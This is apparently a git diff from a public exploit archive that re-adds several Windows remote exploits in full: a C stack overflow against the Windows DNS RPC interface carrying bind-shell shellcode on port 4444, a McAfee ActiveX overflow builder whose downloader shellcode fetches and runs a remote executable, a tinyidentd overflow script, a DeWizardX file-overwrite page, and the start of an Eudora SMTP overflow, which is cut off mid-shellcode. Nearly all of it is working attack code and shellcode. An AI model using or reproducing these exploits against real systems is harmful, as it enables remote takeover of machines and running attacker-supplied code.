Description: +* A vulnerability has been reported in Microsoft Windows, which can +* be exploited by malicious people to compromise a vulnerable system. +* The vulnerability is caused due to a boundary error in an RPC interface +* of the DNS service used for remote management of the service. This can +* be exploited to cause a stack-based buffer overflow via a specially +* crafted RPC request. The DnssrvQuery function is vulnerable to this stack +* overflow. +* +* +* Hotfix/Patch: +* None as of this time. 
+* +* Vulnerable systems: +* Microsoft Windows 2000 Advanced Server +* Microsoft Windows 2000 Datacenter Server +* Microsoft Windows 2000 Server +* Microsoft Windows Server 2003 Datacenter Edition +* Microsoft Windows Server 2003 Enterprise Edition +* Microsoft Windows Server 2003 Standard Edition +* Microsoft Windows Server 2003 Web Edition +* Microsoft Windows Storage Server 2003 +* +* Tested on: +* Microsoft Windows 2000 Advanced Server +* +* This is a PoC and was created for educational purposes only. The +* author is not held responsible if this PoC does not work or is +* used for any other purposes than the one stated above. +* +* Notes: +* <3 Metasploit for releasing it yesterday, only had time to look at it +* this morning. Also props to Winny Thomas. +* +* There are two ways we can embed shellcode. One is to pad each byte of +* the shellcode with '\' and jmp EBX. The other way is the one Winny used +* which is to pass in the shellcode as the third argument in the rpc function +* and jmp EDX after incrementing it appropriately. I used the latter :) +* +* ^^ #pen15, InTeL, D-oNe and ps. 
St0n3y is nub kthxbye +* +* +*/ +#include +#include + +#pragma comment( lib, "ws2_32" ) + +/* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov +http://metasploit.com */ +unsigned char uszShellcode[] = + "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab" + "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2" + "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca" + "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56" + "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37" + "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe" + "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde" + "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04" + "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19" + "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8" + "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81" + "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba" + "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f" + "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d" + "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04" + "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb" + "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90" + "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96" + "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02" + "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85" + "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d" + "\x7d\xe0\xa6\xd2\xab\x1f\x00"; + +/* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */ +unsigned char uszDceBind[] = + "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" + "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" + "\xA4\xC2\xAB\x50\x4D\x57\xB3\x40\x9D\x66\xEE\x4F\xD5\xFB\xA0\x76" + 
"\x05\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" + "\x2B\x10\x48\x60\x02\x00\x00\x00"; + +/* DnssrvQuery: opnum 1 */ +unsigned char uszDceCall[] = + "\x05\x00\x00\x83\x10\x00\x00\x00\x7f\x06\x00\x00\x01\x00\x00\x00" + "\x57\x06\x00\x00\x00\x00\x01\x00\xa4\xc2\xab\x50\x4d\x57\xb3\x40" + "\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x10\xc2\x40\x00\x02\x00\x00\x00" + "\x00\x00\x00\x00\x02\x00\x00\x00\x44\x00\x00\x00\x94\xfa\x13\x00" + "\xcc\x04\x00\x00\x00\x00\x00\x00\xcc\x04\x00\x00"; + +unsigned char uszDceEnd1[] = + "\x41\x00\xb8\xc0\x40\x00\x57\x01\x00\x00\x00\x00\x00\x00\x57\x01" + "\x00\x00"; + +unsigned char uszJmps[] = + /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */ + "\x5C\x29\x5C\x4C\x5C\xE1\x5C\x77" + + /* inc edx, jmp edx */ + "\x5C\x42\x5C\x42\x5C\x42\x5C\x42" + "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" + "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" + "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" + "\x5C\x42\x5C\xFF\x5C\xE2"; + +void usage( ) { + printf("\n\t\tMicrosoft Windows DNS RPC Stack Overflow\n" + "\t\t\t(c) 2007 devcode\n\n" + "usage: dns.exe \n"); +} + +int main( int argc, char **argv ) { + WSADATA wsaData; + SOCKET sConnect; + SOCKADDR_IN sockAddr; + char szRecvBuf[4096]; + unsigned char uszPacket[1663]; + int nRet; + + if ( argc < 3 ) { + usage( ); + return -1; + } + + if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { + printf("[-] Unable to startup winsock\n"); + return -1; + } + + sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); + if ( sConnect == INVALID_SOCKET ) { + printf("[-] Invalid socket\n"); + return -1; + } + + sockAddr.sin_family = AF_INET; + sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); + sockAddr.sin_port = htons( atoi( argv[2] ) ); + + printf("[+] Connecting to %s:%s\n", argv[1], argv[2] ); + nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); + if ( nRet == SOCKET_ERROR ) { + 
closesocket( sConnect ); + printf("[-] Cannot connect to server\n"); + return -1; + } + + printf("[+] Sending DCE Bind packet...\n"); + nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); + if ( nRet == SOCKET_ERROR ) { + closesocket( sConnect ); + printf("[-] Cannot send\n"); + return -1; + } + + nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); + if ( nRet <= 0 ) { + closesocket( sConnect ); + printf("[-] Recv failed\n"); + return -1; + } + + memset( uszPacket, 0x5C, sizeof( uszPacket ) ); + memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 ); + memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 ); + memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) ); + memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) ); + + printf("[+] Sending DCE Request packet...\n"); + nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); + if ( nRet == SOCKET_ERROR ) { + closesocket( sConnect ); + printf("[-] Cannot send\n"); + return -1; + } + + printf("[+] Check shell on port 4444 :)\n"); + nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); + closesocket( sConnect ); + return 0; +} + +// milw0rm.com [2007-04-15] diff --git a/platforms/windows/remote/378.pl b/platforms/windows/remote/378.pl index f00dbffde..776f04db6 100755 --- a/platforms/windows/remote/378.pl +++ b/platforms/windows/remote/378.pl @@ -109,6 +109,6 @@ $res .= $_; if (/$repcode/) { last; } } return $res; -} - -# milw0rm.com [2004-08-05] +} + +# milw0rm.com [2004-08-05] diff --git a/platforms/windows/remote/3810.html b/platforms/windows/remote/3810.html index 6b490499f..8cc328c3d 100755 --- a/platforms/windows/remote/3810.html +++ b/platforms/windows/remote/3810.html @@ -1,83 +1,83 @@ - - - - - - - - - - - - - -# milw0rm.com [2007-04-27] + + + + + + + + + + + + + +# milw0rm.com [2007-04-27] diff --git a/platforms/windows/remote/3877.html b/platforms/windows/remote/3877.html index e26688349..eb5fac388 100755 
--- a/platforms/windows/remote/3877.html +++ b/platforms/windows/remote/3877.html @@ -1,79 +1,79 @@ - - - - - - - IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit - By Umesh Wanve - - - - - - - - - - -# milw0rm.com [2007-05-08] + + + + + + + IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit - By Umesh Wanve + + + + + + + + + + +# milw0rm.com [2007-05-08] diff --git a/platforms/windows/remote/3880.html b/platforms/windows/remote/3880.html index 3135c6b95..3a36fa0a4 100755 --- a/platforms/windows/remote/3880.html +++ b/platforms/windows/remote/3880.html @@ -1,75 +1,75 @@ - - - - - - - - - - - - - -# milw0rm.com [2007-05-09] + + + + + + + + + + + + + +# milw0rm.com [2007-05-09] diff --git a/platforms/windows/remote/3881.html b/platforms/windows/remote/3881.html index 87ebeceb0..e68d7a545 100755 --- a/platforms/windows/remote/3881.html +++ b/platforms/windows/remote/3881.html @@ -1,72 +1,72 @@ - - - - - - - - - - - - - -# milw0rm.com [2007-05-09] + + + + + + + + + + + + + +# milw0rm.com [2007-05-09] diff --git a/platforms/windows/remote/3893.c b/platforms/windows/remote/3893.c index 2aefb36f3..9d7fdd8ab 100755 --- a/platforms/windows/remote/3893.c +++ b/platforms/windows/remote/3893.c 
@@ -1,193 +1,193 @@ -/* - McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability - - Peel the frame from axis,Thanks - - Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15 - - Greetz to OYXin, sowhat, Winny Thomas and 0x557 team -*/ - -#include -#include -#include - -FILE *fp = NULL; -char *file = "McAfee_exploit.html"; -char *url = NULL; - -//Downloader shellcode -unsigned char sc[] = -"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3c\x01\x80\x34\x0B\x99\xE2\xFA" -"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x34\x99\x99\x99\xC3\x12\x6B\xAA" -"\x59\x35\xA4\x01\x99\x99\x99\xEC\x6F\x18\x75\x51\x99\x99\x99\x12" -"\x6D\x10\xCF\xBD\x71\x0C\x99\x99\x99\xAA\x42\x10\x9F\x66\xAF\xF1" -"\x17\xD7\x97\x75\x71\x34\x99\x99\x99\x10\xDF\x91\xF1\xF5\xF5\x99" -"\x99\xF1\xF6\xF7\xB7\xFD\xF1\xEC\xEB\xF5\xF4\xCD\x66\xCF\x91\x10" -"\xDF\x9D\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x11\x99\x99\x99\x10\xDF" -"\x95\x66\xAF\xF1\x01\x67\x13\x97\x71\xE0\x99\x99\x99\x10\xDF\x8D" -"\x66\xAF\xF1\xBC\x29\x66\x5B\x71\xF3\x99\x99\x99\x10\xDF\x81\x66" -"\xEF\x9D\xF1\xAF\x83\xB6\xE9\x71\xC3\x99\x99\x99\x10\xDF\x89\xF3" -"\xFC\xF1\xEA\xB7\xFC\xE1\x10\xFF\x85\x66\xEF\x85\x66\xCF\x81\xAA" -"\x50\xC8\xC8\x66\xEF\x85\x66\xEF\xBD\xC8\x66\xCF\x89\xAA\x50\xC8" -"\x66\xEF\x85\x66\xCF\x8D\x66\xCF\x95\x70\x19\x99\x99\x99\xCC\xCF" -"\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12\xE9\x85" -"\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99\x99\x12" -"\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC" -"\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A" -"\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED" -"\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3" -"\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A" -"\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99\x71\x50" -"\x67\x66\x66"; -unsigned char sc_2[] = "\x98"; - -char * header = -"\n\n" - -"\n" -"\n" -"\n" -"\n"; - - - -char * trigger_1 = -"\n" -"\n"; - - -// 
print unicode shellcode -void PrintPayLoad(char *lpBuff, int buffsize) -{ -int i; -for(i=0;i\n"); - printf("#\ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>\n"); - printf("#\tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.html\n"); - printf("#\t100%% successful\? who knows\;\)\n"); - printf("\r\nUsage: %s [htmlfile]\n", argv[0]); - printf("\r\nE.g.: %s http://www.fakename.com/hello.exe exploit.html\r\n\n", argv[0]); -exit(1); -} - -url = argv[1]; - - -if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) -{ -printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); -return; -} - -printf("[+] download url:%s\n", url); - -if(argc >=3) file = argv[2]; -printf("[+] exploit file:%s\n", file); - -fp = fopen(file, "w"); -if(!fp) -{ -printf("[-] Open file error!\n"); -return; -} - - -//build evil html file -fprintf(fp, "%s", header); -fflush(fp); - -memset(buf, 0, sizeof(buf)); -sc_len = sizeof(sc)-1; -memcpy(buf, sc, sc_len); -memcpy(buf+sc_len, url, strlen(url)); - -sc_len += strlen(url); - -memcpy(buf+sc_len, sc_2, 1); -sc_len += 1; - -PrintPayLoad((char *)buf, sc_len); - -fprintf(fp, "%s", footer); -fflush(fp); - -fprintf(fp, "%s", trigger_1); -fflush(fp); - - -printf("[+] exploit write to %s success!\n", file); -} - -// milw0rm.com [2007-05-10] +/* + McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability + + Peel the frame from axis,Thanks + + Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15 + + Greetz to OYXin, sowhat, Winny Thomas and 0x557 team +*/ + +#include +#include +#include + +FILE *fp = NULL; +char *file = "McAfee_exploit.html"; +char *url = NULL; + +//Downloader shellcode +unsigned char sc[] = +"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3c\x01\x80\x34\x0B\x99\xE2\xFA" +"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x34\x99\x99\x99\xC3\x12\x6B\xAA" +"\x59\x35\xA4\x01\x99\x99\x99\xEC\x6F\x18\x75\x51\x99\x99\x99\x12" 
+"\x6D\x10\xCF\xBD\x71\x0C\x99\x99\x99\xAA\x42\x10\x9F\x66\xAF\xF1" +"\x17\xD7\x97\x75\x71\x34\x99\x99\x99\x10\xDF\x91\xF1\xF5\xF5\x99" +"\x99\xF1\xF6\xF7\xB7\xFD\xF1\xEC\xEB\xF5\xF4\xCD\x66\xCF\x91\x10" +"\xDF\x9D\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x11\x99\x99\x99\x10\xDF" +"\x95\x66\xAF\xF1\x01\x67\x13\x97\x71\xE0\x99\x99\x99\x10\xDF\x8D" +"\x66\xAF\xF1\xBC\x29\x66\x5B\x71\xF3\x99\x99\x99\x10\xDF\x81\x66" +"\xEF\x9D\xF1\xAF\x83\xB6\xE9\x71\xC3\x99\x99\x99\x10\xDF\x89\xF3" +"\xFC\xF1\xEA\xB7\xFC\xE1\x10\xFF\x85\x66\xEF\x85\x66\xCF\x81\xAA" +"\x50\xC8\xC8\x66\xEF\x85\x66\xEF\xBD\xC8\x66\xCF\x89\xAA\x50\xC8" +"\x66\xEF\x85\x66\xCF\x8D\x66\xCF\x95\x70\x19\x99\x99\x99\xCC\xCF" +"\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12\xE9\x85" +"\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99\x99\x12" +"\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC" +"\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A" +"\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED" +"\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3" +"\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A" +"\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99\x71\x50" +"\x67\x66\x66"; +unsigned char sc_2[] = "\x98"; + +char * header = +"\n\n" + +"\n" +"\n" +"\n" +"\n"; + + + +char * trigger_1 = +"\n" +"\n"; + + +// print unicode shellcode +void PrintPayLoad(char *lpBuff, int buffsize) +{ +int i; +for(i=0;i\n"); + printf("#\ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>\n"); + printf("#\tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.html\n"); + printf("#\t100%% successful\? who knows\;\)\n"); + printf("\r\nUsage: %s [htmlfile]\n", argv[0]); + printf("\r\nE.g.: %s http://www.fakename.com/hello.exe exploit.html\r\n\n", argv[0]); +exit(1); +} + +url = argv[1]; + + +if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) +{ +printf("[-] Invalid url. 
Must start with 'http://','ftp://'\n"); +return; +} + +printf("[+] download url:%s\n", url); + +if(argc >=3) file = argv[2]; +printf("[+] exploit file:%s\n", file); + +fp = fopen(file, "w"); +if(!fp) +{ +printf("[-] Open file error!\n"); +return; +} + + +//build evil html file +fprintf(fp, "%s", header); +fflush(fp); + +memset(buf, 0, sizeof(buf)); +sc_len = sizeof(sc)-1; +memcpy(buf, sc, sc_len); +memcpy(buf+sc_len, url, strlen(url)); + +sc_len += strlen(url); + +memcpy(buf+sc_len, sc_2, 1); +sc_len += 1; + +PrintPayLoad((char *)buf, sc_len); + +fprintf(fp, "%s", footer); +fflush(fp); + +fprintf(fp, "%s", trigger_1); +fflush(fp); + + +printf("[+] exploit write to %s success!\n", file); +} + +// milw0rm.com [2007-05-10] diff --git a/platforms/windows/remote/3925.py b/platforms/windows/remote/3925.py index 74f6e764d..5b4d2f490 100755 --- a/platforms/windows/remote/3925.py +++ b/platforms/windows/remote/3925.py 
@@ -1,59 +1,59 @@ -# -#tinyidentd exploit code by -#thomas . pollet _at_ gmail . com -#bug by Maarten Boone -# -#usage: python exploit.py [target] -# -import socket,sys -#jmp into nop sled -payload = '\xeb\x20' -#ident crap -payload += ', 28 : USERID : UNIX : ' -#nop sled -payload +='XXXX' -# jmp *%esi -payload += '\x77\x13\x83\x7c' #XP kernel32.dll -#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll -#metasploit alphanumeric shellcode calc.exe -shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44" -shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42" -shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b" -shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x35\x35\x6c\x4e" -shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x4b\x52\x6f\x46" -shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x49\x6c\x4b\x54" -shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x39\x4c\x6c\x4d" -shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x4d\x63\x31\x79" -shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x64\x31\x65\x4a" -shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x46\x6e\x6b\x64" -shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x6b\x4c\x4b\x57" -shellcode += "\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x74\x67\x74\x4a" -shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x30\x4f\x75\x4f" -shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x4b\x70\x70\x57" -shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x69\x6c\x4b\x4d" -shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x38\x35\x6c\x41" -shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x48\x6f\x73\x6f" -shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x74\x51\x4f\x45" -shellcode += 
"\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x6f\x38\x67\x73" -shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x78\x70\x65\x45" -shellcode += "\x50\x44" - -nopsize=523-len(payload)-len(shellcode) -nopsled='' -for i in range(nopsize): - nopsled+='\x90' - -payload=payload.replace('XXXX',nopsled+shellcode) - -try: - target=sys.argv[1] - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((target,113)) - s.send(payload+'\n') - s.close() - print 'done' -except: - print 'usage : %s [target]'%sys.argv[0] - -# milw0rm.com [2007-05-14] +# +#tinyidentd exploit code by +#thomas . pollet _at_ gmail . com +#bug by Maarten Boone +# +#usage: python exploit.py [target] +# +import socket,sys +#jmp into nop sled +payload = '\xeb\x20' +#ident crap +payload += ', 28 : USERID : UNIX : ' +#nop sled +payload +='XXXX' +# jmp *%esi +payload += '\x77\x13\x83\x7c' #XP kernel32.dll +#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll +#metasploit alphanumeric shellcode calc.exe +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44" +shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42" +shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b" +shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x35\x35\x6c\x4e" +shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x4b\x52\x6f\x46" +shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x49\x6c\x4b\x54" +shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x39\x4c\x6c\x4d" +shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x4d\x63\x31\x79" +shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x64\x31\x65\x4a" +shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x46\x6e\x6b\x64" +shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x6b\x4c\x4b\x57" +shellcode += 
"\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x74\x67\x74\x4a" +shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x30\x4f\x75\x4f" +shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x4b\x70\x70\x57" +shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x69\x6c\x4b\x4d" +shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x38\x35\x6c\x41" +shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x48\x6f\x73\x6f" +shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x74\x51\x4f\x45" +shellcode += "\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x6f\x38\x67\x73" +shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x78\x70\x65\x45" +shellcode += "\x50\x44" + +nopsize=523-len(payload)-len(shellcode) +nopsled='' +for i in range(nopsize): + nopsled+='\x90' + +payload=payload.replace('XXXX',nopsled+shellcode) + +try: + target=sys.argv[1] + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target,113)) + s.send(payload+'\n') + s.close() + print 'done' +except: + print 'usage : %s [target]'%sys.argv[0] + +# milw0rm.com [2007-05-14] diff --git a/platforms/windows/remote/3927.html b/platforms/windows/remote/3927.html index 7f326e985..0a2bacd93 100755 --- a/platforms/windows/remote/3927.html +++ b/platforms/windows/remote/3927.html @@ -1,45 +1,45 @@ -

    -

    2007/05/15

    ------------------------------------------------------------------------------------ - DB Software Laboratory DeWizardX (DEWizardAX.ocx) Remote Arbitrary File Overwrite - url: http://www.dbsoftlab.com - price: $100 - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not be responsible for any damage. - - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 - all software that use this ocx are vulnerable to these exploits. ------------------------------------------------------------------------------------ - - - - - - - -
    - -# milw0rm.com [2007-05-15] +
    +

    2007/05/15

    +----------------------------------------------------------------------------------- + DB Software Laboratory DeWizardX (DEWizardAX.ocx) Remote Arbitrary File Overwrite + url: http://www.dbsoftlab.com + price: $100 + + author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not be responsible for any damage. + + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! + + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 + all software that use this ocx are vulnerable to these exploits. +----------------------------------------------------------------------------------- + + + + + + + +
    + +# milw0rm.com [2007-05-15] diff --git a/platforms/windows/remote/3934.py b/platforms/windows/remote/3934.py index f261c4010..2abd5c966 100755 --- a/platforms/windows/remote/3934.py +++ b/platforms/windows/remote/3934.py 
@@ -1,56 +1,56 @@ -#!/usr/bin/python -# Eudora 7.1 SMTP Response 0day Remote Buffer Overflow PoC Exploit -# Bug discovered by Krystian Kloskowski (h07) -# Tested on Eudora 7.1.0.9 / XP SP2 Polish -# Shellcode type: Windows Execute Command (calc.exe) -# Note:.. -# This vulnerability can be exploited only if user -# will ignore warning about "buffer overflow" error. -## - -from struct import pack -from time import sleep -from socket import * - -bind_addr = '0.0.0.0' -bind_port = 25 - -shellcode = ( -"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" -"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" -"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" -"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" -"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" -"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" -"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" 